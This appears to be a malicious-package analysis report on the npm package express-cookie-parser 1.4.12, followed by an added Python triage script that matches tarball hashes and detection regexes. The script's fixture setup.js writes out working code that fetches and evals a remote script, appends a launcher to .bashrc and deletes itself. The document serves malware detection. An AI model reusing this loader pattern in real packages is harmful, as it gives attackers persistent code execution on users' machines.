
express-cookie-parser@1.4.12

Possibly Malicious
Analyzed at: 4/23/2025, 8:31:44 AM
Source: https://registry.npmjs.org/express-cookie-parser/-/express-cookie-parser-1.4.12.tgz
SHA256: 511d911e4d6812987e6c90cf49b9bfcf29337d3b81dcab19b1000500ca8812f6
Confidence: Medium
Summary

This analysis was performed using vet and SafeDep Cloud Malicious Package Analysis. To run the same analysis on your own dependencies, integrate it with GitHub using the vet-action GitHub Action.

Remote code execution, persistence, self-deletion, and obfuscation found in the package's code strongly indicate that the package is malicious.

Details

The package express-cookie-parser (version 1.4.12) shows strong indicators of malicious behavior in the LLM-based file analysis. Evidence 0 shows code that fetches and executes a script from a GitHub URL (remote code execution); Evidence 1 shows the creation of a startup script so the code runs again after a reboot (persistence); Evidence 2 shows the package deleting its own files to hinder analysis (self-deletion); and Evidence 3 shows obfuscation used to mask this logic. The lack of project information (Evidence 4) adds to the suspicion but is not decisive on its own; the combination of the four behavioral findings is what supports classifying the package as malware. Remote code execution alone lets an attacker run arbitrary code on any host that installs the package, the persistence mechanism keeps that access across reboots, and self-deletion together with obfuscation works against detection and forensic review. Taken together, these factors make this a clear case of malicious software.
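The four behavior classes above (remote code fetch and execution, persistence, self-deletion, obfuscation) are the kind of thing a practitioner can pre-screen for before handing a tarball to a deeper analysis service. The script below is an added example, not vet's or SafeDep's code and not the contents of express-cookie-parser: it verifies that a local .tgz matches the SHA256 the report lists, then checks package.json for install-time lifecycle hooks and greps every file for one illustrative regex per indicator class. The regexes are assumptions about how each class typically appears in JavaScript source, and `SAMPLE_FILES` is a constructed fixture of inert strings that carries those tokens so the script runs offline.

```python
"""Triage an npm tarball for the indicator classes named in the report.

Added example, not SafeDep's or vet's code. INDICATORS are assumed shapes for
each class, and SAMPLE_FILES is a constructed fixture, not the real package.
"""
import hashlib
import io
import json
import re
import tarfile

# SHA256 the report lists for express-cookie-parser-1.4.12.tgz.
REPORTED_SHA256 = "511d911e4d6812987e6c90cf49b9bfcf29337d3b81dcab19b1000500ca8812f6"

# npm runs these automatically on install; a hook that launches a script is
# what turns suspicious code into code that runs on every install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# One pattern per indicator class from the report (assumed shapes, not vet's rules).
INDICATORS = {
    "remote_code_fetch": re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/\S+", re.I),
    "dynamic_exec": re.compile(r"\b(?:eval|child_process|execSync|spawn)\b|new Function"),
    "persistence": re.compile(r"\.bashrc|\.profile|crontab|LaunchAgents|\bStartup\b|CurrentVersion\\Run", re.I),
    "self_delete": re.compile(r"unlink(?:Sync)?\s*\(\s*__filename"),
    "obfuscation": re.compile(r"(?:\\x[0-9a-f]{2}){4,}|fromCharCode|\batob\(|Buffer\.from\([^)]*,\s*['\"]base64['\"]", re.I),
}


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_reported_hash(data: bytes, expected: str) -> bool:
    """Confirm the artifact on disk is the one the report analyzed."""
    return sha256_of(data) == expected.lower()


def scan_tarball(data: bytes) -> dict:
    """Return install hooks and per-indicator file hits for a .tgz held in memory."""
    findings = {"lifecycle_hooks": [], "indicators": {}}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            if member.name.endswith("package.json"):
                scripts = json.loads(text).get("scripts", {})
                findings["lifecycle_hooks"] = [h for h in LIFECYCLE_HOOKS if h in scripts]
            for label, rx in INDICATORS.items():
                if rx.search(text):
                    findings["indicators"].setdefault(label, []).append(member.name)
    return findings


def verdict(findings: dict) -> str:
    """An install-time hook plus two or more behavior classes mirrors the report's reasoning."""
    classes = len(findings["indicators"])
    if findings["lifecycle_hooks"] and classes >= 2:
        return "possibly_malicious"
    return "review" if classes else "clean"


# Constructed fixture: inert strings carrying the indicator tokens, not a payload
# and not the contents of express-cookie-parser.
SAMPLE_FILES = {
    "package/package.json": json.dumps(
        {"name": "constructed-sample", "version": "0.0.0",
         "scripts": {"postinstall": "node setup.js"}}, indent=2),
    "package/index.js": (
        "module.exports = function parse(str) {\n"
        "  return Object.fromEntries(str.split(';').map(p => p.trim().split('=')));\n"
        "};\n"),
    "package/setup.js": r"""
const https = require("https"), fs = require("fs"), os = require("os"), path = require("path");
const { execSync } = require("child_process");
const src = "https://raw.githubusercontent.com/example/example/main/stage2.js";
https.get(src, r => { let b = ""; r.on("data", d => (b += d)); r.on("end", () => eval(b)); });
fs.appendFileSync(path.join(os.homedir(), ".bashrc"), "\nnode " + __dirname + "/stage2.js &\n");
fs.unlinkSync(__filename);
const tag = "\x73\x74\x61\x67\x65";
""",
}


def build_sample_tarball() -> bytes:
    """Pack SAMPLE_FILES into a gzipped tar laid out like an npm artifact."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in SAMPLE_FILES.items():
            payload = text.encode()
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    blob = build_sample_tarball()
    print("matches reported hash:", matches_reported_hash(blob, REPORTED_SHA256))
    result = scan_tarball(blob)
    print(json.dumps(result, indent=2))
    print("verdict:", verdict(result))
```

To use this against the real artifact, download the tarball from the Source URL above, read it as bytes, and call `matches_reported_hash` before `scan_tarball`; a hash mismatch means you are not looking at the version the report analyzed. The constructed fixture deliberately fails the hash check. Regex hits are a triage signal only: the `persistence` and `obfuscation` patterns in particular will fire on some legitimate tooling, so treat a `possibly_malicious` result as a reason to read the flagged files, not as a verdict.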